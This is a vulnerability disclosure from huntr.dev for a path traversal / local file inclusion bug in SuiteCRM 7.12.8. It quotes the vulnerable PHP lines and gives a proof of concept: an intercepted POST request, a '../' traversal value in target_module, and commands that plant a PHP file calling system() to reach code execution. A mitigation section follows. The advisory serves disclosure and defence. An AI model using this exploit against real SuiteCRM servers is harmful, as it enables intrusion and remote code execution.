Lucene search

K
huntrCr4ckc4t0C1365BC-8D9A-4AE0-8B55-615D492B3730
HistoryNov 29, 2022 - 2:06 p.m.

Limited LFI via Path Traversal

2022-11-2914:06:33
cr4ckc4t
www.huntr.dev
14
suitecrm
lfi
path traversal
php file
user authentication
remote attackers
remote code execution
proof of concept
vulnerability

EPSS

0.001

Percentile

38.0%

Description

A path thraversal vulnerability in SuiteCRM 7.12.8 and earlier allows remote authenticated attackers to include a php file at an arbitrary path via unsanitized request parameters.

Details

In Suite CRM v7.12.8, SubpanelCreates.php and SubpanelEdit.php trust unsanitized user input to load a .php file via require. At least low level user authentication is required to trigger the vulnerability.

// SubpanelCreates.php L44
// User controls target_module
$mod_strings = return_module_language($current_language, $_REQUEST['target_module']);
[...]
// utils.php L1422
// $module is still the user input
$loaded_mod_strings = LanguageManager::loadModuleLanguage($module, $language, $refresh);
[...]
// LanguageManager.php L268
// $module is still the user input
$cachedfile = sugar_cached('modules/').$module.'/language/'.$lang.'.lang.php';
[...]
if (file_exists($cachedfile)) {
            global $mod_strings;

            require $cachedfile;
[...]

Proof of Concept

1 - Login to SuiteCRM (normal user with default permissions is enough - PoC requires the user to create a “Call”)

2 - Navigate to “Calls” - “Create Call” - fill in a subject - “Save”

3 - Now select “Create Note or Attachment” from the “Notes” tab

4 - Intercept the outgoing request - it looks like this:

POST /index.php HTTP/1.1
Host: 10.0.5.4
Content-Length: 418
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.0.5.4
Referer: http://10.0.5.4/index.php?action=DetailView&module=Calls&record=61494278-5f7e-8c0c-8ebe-63860394c556&return_module=Calls&return_action=DetailView&offset=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; _ga=GA1.1.942238813.1668699570; browserupdateorg=pause; xoops_user_6374ee42=1-004d76ce862be7d3476fa5bed68d529fcc57448ce07ed55dcc3b827801f37c407993b00bbb152419355fd8f86445e6d7da86a1782ef4fdfae3b13ad68c48dca8-ba58b54cd01bef7565aef75880049a8a6c96275c7a5aeb7300f0c8833ea4d4c4ed6ff2afdd46555b0819c3de5c74525754f982ec9b8eef59a2cbed14055afe7d; sid=1; shash=%242y%2410%241X9GGrpnbjXuiqGOwJrkZueXrHY6cCGUKtZ88Abw1euO62sfw6yRe; miniSidebar=1; sugar_user_theme=SuiteP; ck_login_language_20=en_us; Tasks_divs=Tasks_history_v%3Dtrue%23undefined%3D%23Tasks_securitygroups_v%3Dtrue%23; Contacts_divs=Contacts_bugs_v%3Dtrue%23undefined%3D%23; EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; Accounts_divs=Accounts_activities_v%3Dtrue%23undefined%3D%23Accounts_history_v%3Dfalse%23Accounts_documents_v%3Dtrue%23Accounts_contacts_v%3Dtrue%23Accounts_securitygroups_v%3Dtrue%23; ck_login_theme_20=SuiteP; ck_login_id_20=58b402d3-aef6-2b59-a5c9-6385e39c3b6a; Users_divs=Users_aclroles_v%3Dtrue%23undefined%3D%23Users_securitygroups_v%3Dtrue%23; SecurityGroups_divs=SecurityGroups_users_v%3Dtrue%23undefined%3D%23SecurityGroups_aclroles_v%3Dtrue%23; Calls_divs=Calls_contacts_v%3Dtrue%23undefined%3D%23Calls_users_v%3Dtrue%23Calls_leads_v%3Dtrue%23Calls_history_v%3Dtrue%23; sidebartoggle=expanded; PHPSESSID=q0si3s73dopom9kqvnttdjbcmn
Connection: close

target_module=Notes&call_id=61494278-5f7e-8c0c-8ebe-63860394c556&call_name=a&to_pdf=true&tpl=QuickCreate.tpl&return_module=Calls&return_action=DetailView&return_id=61494278-5f7e-8c0c-8ebe-63860394c556&record=&action=SubpanelCreates&module=Home&target_action=QuickCreate&parent_type=Calls&parent_name=a&parent_id=61494278-5f7e-8c0c-8ebe-63860394c556&History_createnoteorattachment_button=Create%20Note%20or%20Attachment

We can now modify the target_module parameter to point to an arbitrary location.

Combined with any sort of file upload (e.g. FTP), this may turn into RCE. In a location that’s accessible by the webserver:

# for example in /home/dummy/Documents (could also be an NFS or FTP share)
mkdir language
echo "<?php system('touch /var/www/html/i-was-here.txt'); ?>" > language/en_us.lang.php

Replace target_module with ../../../../../home/dummy/Documents and forward the request. The file i-was-here.txt is now in the web-root.

Mitigation

Sanitize the user input for example by removing . and /.

Notes

Testing was done with SubpanelCreates.php. SubpanelEdits.php contains the same vulnerable lines, however, I was not able to identify a valid entry point for that file during testing. I expect it to be exploitable in the same fashion.

EPSS

0.001

Percentile

38.0%

Related for 0C1365BC-8D9A-4AE0-8B55-615D492B3730